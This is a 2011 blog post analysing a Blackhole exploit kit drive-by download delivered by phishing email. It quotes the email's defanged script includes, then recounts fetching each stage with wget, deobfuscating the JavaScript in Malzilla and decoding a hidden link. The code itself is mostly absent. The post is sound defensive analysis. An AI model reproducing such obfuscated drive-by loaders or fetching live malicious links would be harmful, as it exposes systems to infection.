Wednesday, December 21, 2011

Blackhole Toolkit drive-by download reversed

So..seeing those "Transaction system failure".  Included in the email is this great tidbit:

<h1>WAIT PLEASE</h1>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://"></script>

so let's wget one of these and see what we have:


let's wget THAT and see what we have:

Yugh...obfuscated javascript...ick.  So let's fire up Malzilla and see what we can do.  I copied the above into the Decoder tab and hit debug.  I get an:
aa is not defined 

Well that stinks.  But I DO get some good info from the Variable State window, so let's change the easy ones:


Still the same "aa is not defined" error after clicking lets nuke that if portion to show:

Now we're hot doggin!  Closing the Debug window will give us:

So let's see what that eval_temp file up the temp file in note/wordpad, copy ALL of it, create a new Decoder tab in Malzilla and dump it in and Format Code:

Note the rabbit link.  Now...there's a LOT of crap going on here...pdf/java/flash version checks to name a few.  But what caught my eye was down at the bottom area:

Let's copy all those comma numbers, go to the Misc Decoders, paste um in.  Don't forget to add a comma at the very start of the string.  Click the Decode Dec(,) button:
Hey hey!  Look at that.  Let's wget THAT link and see what we get:


Vicheck and Virustotal don't show much...scary:  

No comments:

Post a Comment